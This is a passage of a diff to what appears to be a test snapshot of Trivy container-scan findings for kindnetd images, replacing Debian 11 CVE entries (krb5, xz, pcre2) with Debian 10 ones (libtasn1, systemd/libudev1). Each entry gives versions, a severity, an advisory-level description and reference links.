"value": "https://security.netapp.com/advisory/ntap-20221118-0006/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://ubuntu.com/security/notices/USN-5707-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-1000654", + "installedVersion": "4.13-3", + "packageName": "libtasn1-6", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", + "http://www.securityfocus.com/bid/105151", + "https://access.redhat.com/security/cve/CVE-2018-1000654", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", + "https://gitlab.com/gnutls/libtasn1/issues/4", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", + "https://ubuntu.com/security/notices/USN-5352-1", + "https://www.cve.org/CVERecord?id=CVE-2018-1000654", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "description": "GNU Libtasn1-4.13 libtasn1-4.13 version libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100% when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree), after a long time, the program will be killed. This attack appears to be exploitable via parsing a crafted file.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "libtasn1: Infinite loop in _asn1_expand_object_id(ptree) leads to memory exhaustion", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", + "value": "https://avd.aquasec.com/nvd/cve-2018-1000654", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "http://www.securityfocus.com/bid/105151", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://access.redhat.com/security/cve/CVE-2018-1000654", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://gitlab.com/gnutls/libtasn1/issues/4", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://ubuntu.com/security/notices/USN-5352-1", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-1000654", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3843", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", + "references": [ + "http://www.securityfocus.com/bid/108116", + "https://access.redhat.com/security/cve/CVE-2019-3843", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "https://linux.oracle.com/cve/CVE-2019-3843.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3843", + ], + }, + "category": "Vulnerability", + "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "systemd: services with DynamicUser can create SUID/SGID binaries", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-3843", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "http://www.securityfocus.com/bid/108116", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-3843", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", }, ], "severity": "HIGH", @@ -90846,620 +91625,655 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3844", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "http://www.securityfocus.com/bid/108096", + "https://access.redhat.com/security/cve/CVE-2019-3844", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "https://linux.oracle.com/cve/CVE-2019-3844.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3844", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", - }, - { - "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - }, - { - "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2019-3844", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "http://www.securityfocus.com/bid/108096", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "5.2.5-2.1~deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1271", - "installedVersion": "5.2.5-2", - "packageName": "liblzma5", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:4940", - "https://access.redhat.com/security/cve/CVE-2022-1271", - "https://bugzilla.redhat.com/2073310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", - "https://errata.almalinux.org/9/ALSA-2022-4940.html", - "https://errata.rockylinux.org/RLSA-2022:4940", - "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", - "https://linux.oracle.com/cve/CVE-2022-1271.html", - "https://linux.oracle.com/errata/ELSA-2022-5052.html", - "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", - "https://security-tracker.debian.org/tracker/CVE-2022-1271", - "https://security.gentoo.org/glsa/202209-01", - "https://security.netapp.com/advisory/ntap-20220930-0006/", - "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", - "https://ubuntu.com/security/notices/USN-5378-1", - "https://ubuntu.com/security/notices/USN-5378-2", - "https://ubuntu.com/security/notices/USN-5378-3", - "https://ubuntu.com/security/notices/USN-5378-4", - "https://www.cve.org/CVERecord?id=CVE-2022-1271", - "https://www.openwall.com/lists/oss-security/2022/04/07/8", - ], - }, - "category": "Vulnerability", - "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "arbitrary-file-write vulnerability", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1271", + "value": "https://access.redhat.com/security/cve/CVE-2019-3844", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:4940", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1271", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2073310", + "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4940", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", }, { "type": "URL", - "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "241-7~deb10u9", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-26604", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-26604", + "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "https://github.com/systemd/systemd/issues/5666", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "https://security.netapp.com/advisory/ntap-20230505-0009/", + "https://www.cve.org/CVERecord?id=CVE-2023-26604", + ], + }, + "category": "Vulnerability", + "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "privilege escalation via the less pager", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "value": "https://avd.aquasec.com/nvd/cve-2023-26604", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "value": "https://access.redhat.com/security/cve/CVE-2023-26604", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-01", + "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", }, { "type": "URL", - "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-1", + "value": "https://github.com/systemd/systemd/issues/5666", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-2", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-3", + "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-4", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "10.36-2+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1586", - "installedVersion": "10.36-2", - "packageName": "libpcre2-8-0", + "fixedVersion": "241-7~deb10u8", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33910", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/errata/RHSA-2022:5809", - "https://access.redhat.com/security/cve/CVE-2022-1586", - "https://bugzilla.redhat.com/2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", - "https://errata.almalinux.org/8/ALSA-2022-5809.html", - "https://errata.rockylinux.org/RLSA-2022:5809", - "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", - "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", - "https://linux.oracle.com/cve/CVE-2022-1586.html", - "https://linux.oracle.com/errata/ELSA-2022-5809.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", - "https://security.netapp.com/advisory/ntap-20221028-0009/", - "https://ubuntu.com/security/notices/USN-5627-1", - "https://ubuntu.com/security/notices/USN-5627-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1586", + "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "https://access.redhat.com/security/cve/CVE-2021-33910", + "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "https://linux.oracle.com/cve/CVE-2021-33910.html", + "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20211104-0008/", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "https://www.debian.org/security/2021/dsa-4942", + "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", + "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre2: Out-of-bounds read in compile_xclass_matchingpath in pcre2_jit_compile.c", + "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1586", + "value": "https://avd.aquasec.com/nvd/cve-2021-33910", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5809", + "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1586", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2077976", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", + "value": "https://access.redhat.com/security/cve/CVE-2021-33910", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5809.html", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5809", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", }, { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", + "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", }, { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", + "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1586.html", + "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5809.html", + "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "value": 